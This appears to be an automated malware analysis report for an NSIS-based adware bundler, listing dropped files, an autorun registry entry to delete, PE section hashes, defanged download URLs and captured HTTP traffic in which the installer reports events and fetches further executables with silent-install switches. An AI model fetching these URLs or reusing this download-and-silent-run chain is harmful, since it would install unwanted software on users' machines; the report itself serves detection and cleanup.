%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
| .rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
| .data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
| .ndata | 147456 | 2125824 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 2273280 | 2528 | 2560 | 3.12379 | 6c32aa39199a42052d5b9d646394f08c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 4
3cc57d62125a365e0ff6201b70287906
c5acb017c8a1c1610092143cfe7c575f
446f59bd241950572e32cdc0b91875f6
75575eb58aab24025966cd48526b2a5d
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.225.185.107 |
| hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.189.17 |
| hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.230.14.162 |
| hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.17 |
| hxxp://djapp.info/?file=bundle&v=2 | |
| hxxp://d2fpsq9kg43yka.cloudfront.net/prepreinstaller_win.exe | 54.230.14.162 |
| hxxp://d2fpsq9kg43yka.cloudfront.net/SilentInstaller_dotnet4.exe | 54.230.14.162 |
| hxxp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= | |
| hxxp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 | |
| hxxp://d2u4zym7ey0920.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.230.14.73 |
| hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
| hxxp://json.agewftkv.comhxxp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 | |
| hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.230.14.42 |
| hxxp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe | 54.230.14.73 |
| hxxp://www.downloadsoup.com/thankyou.php | 54.225.134.66 |
| hxxp://www.djapp.info/?file=bundle&v=2 | 52.1.45.42 |
| hxxp://events.agewftkv.comhxxp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= | |
| hxxp://d2u4zym7ey0920.cloudfront.net/SilentInstaller_dotnet4.exe | 54.230.14.73 |
| hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
| d20ssor9owizgr.cloudfront.net | 54.230.14.201 |
| d24u51ac8ybaqu.cloudfront.net | 54.230.14.81 |
| s3.amazonaws.com | 54.231.15.24 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:27:52 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:27:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:03 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:03 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:04 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:04 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 185
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:15 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 198
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:25 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:25 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:26 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 503 Service Unavailable
Cache-Control: no-cache
Content-Type: text/html
transfer-encoding: chunked
Connection: keep-alive
6b..<html><body><h1>503 Service Unavailable</h1>.No server is available to handle this request..</body></html>...0..HTTP/1.1 503 Service Unavailable..Cache-Control: no-cache..Content-Type: text/html..transfer-encoding: chunked..Connection: keep-alive..6b..<html><body><h1>503 Service Unavailable</h1>.No server is available to handle this request..</body></html>...0......
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:37 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:47 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:48 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28:48 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=ad70c77a656a8cbfc8becf0386552d1e&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1450916936&ts=1450916936&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsh1D.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 24 Dec 2015 00:28:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:27:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.30
42e..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-tot-mdh-lvs-ppt-opw-jot-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe.. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=__R9ylls..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..http://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://VVV.czzsyzgm.com/pptxd.exe.. ..hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=NOCHPC.. ..http://mobilitydata5.com/SysInfo/tem.php?sid=83837567483.. ..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542.. ..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://counter99.com/SysInfo/r2d.php?guid=587785-23098-234-1123F.. ..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Thu, 24 Dec 2015 00:27:52 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.30..42e..http://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-tot-mdh-lvs-ppt-opw-jot-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe.. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=__R9ylls..hXXps://s3.
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:28:03 GMT
Content-Type: application/octet-stream
Content-Length: 127888
Connection: keep-alive
X-Powered-By: PHP/5.5.30
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=L5lD0nHnr.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................0...............................................t....... ...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc........ .......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /prepreinstaller_win.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2u4zym7ey0920.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 557568
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:42:57 GMT
Last-Modified: Tue, 22 Dec 2015 09:35:36 GMT
ETag: "29bf30427bc3544fab563d0d7d36f05d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42245
X-Cache: Hit from cloudfront
Via: 1.1 edd2a5d0833e10b384dd66f5bbc84266.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gSQrgtUsaSNcpkgie_cOo1RXuzq_xv7DpIICzGiC8GVJPP5uCTluSA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}....W..}....b..}....c..}....Z..}...}...}....f..}....S..}...}^..}....T..}..Rich.}..................PE..L...X.yV.............................*............@.......................................@.................................|...<................................ ...................................K..@...............|............................text............................... ..`.rdata..............................@..@.data....3..........................@....rsrc...............................@..@.reloc...6.......8...J..............@..B..................................................................................................................................................................................................................................................................................................................................................T.B......U..V....T.B.......E..t.V.....Y..^]...V..t.f.0f;1u.......Ju.3.^....f;.^.....@.j,...A..u.....3..u....C.3..G......w..}..E.f...u..E.....;.......3..U....U..K..M....r.......f.<.=.........r...........P.E......Y..u.f.}. t.f.}./.......{..r........M.f....E..f.Du.F...u}3..|u.....E.j..E.P3..,.B..*...Ff.....|..E..M...........M.f.E..E...............f.E..E........E.3.f.E...D}..u.P.....G...|..}.3..}................j.Y;.}.3.... ...........|u.....f..3..|].....E.j..E.P3..,.B..y...Cf.....|..E..M...........M.f.
<<< skipped >>>
GET /?file=bundle&v=2 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.djapp.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 24 Dec 2015 00:34:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 24 Dec 2015 00:34:38 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe..0..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 84407
Connection: keep-alive
Date: Wed, 23 Dec 2015 11:09:11 GMT
Last-Modified: Wed, 23 Dec 2015 11:04:25 GMT
ETag: "dd326cafa8f8dfb20c5183a1cc3daab6"
Accept-Ranges: bytes
Server: AmazonS3
Age: 47923
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: G0vkfgWSWmOoG3LP2Cs8yt7QCNjeLl4AM_Jc_0hjQ8A1kuw7WKreOw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x...x...x.......z...x...........i...,...t.......y...Richx...................PE..L......K.................\....9......0.......p....@..........................@T..............................................s.......0T..............................................................................p...............................text...,Z.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc........0T......v..............@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....&z..H.P.u..u..u...Hr@..B...SV.5.&z..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... 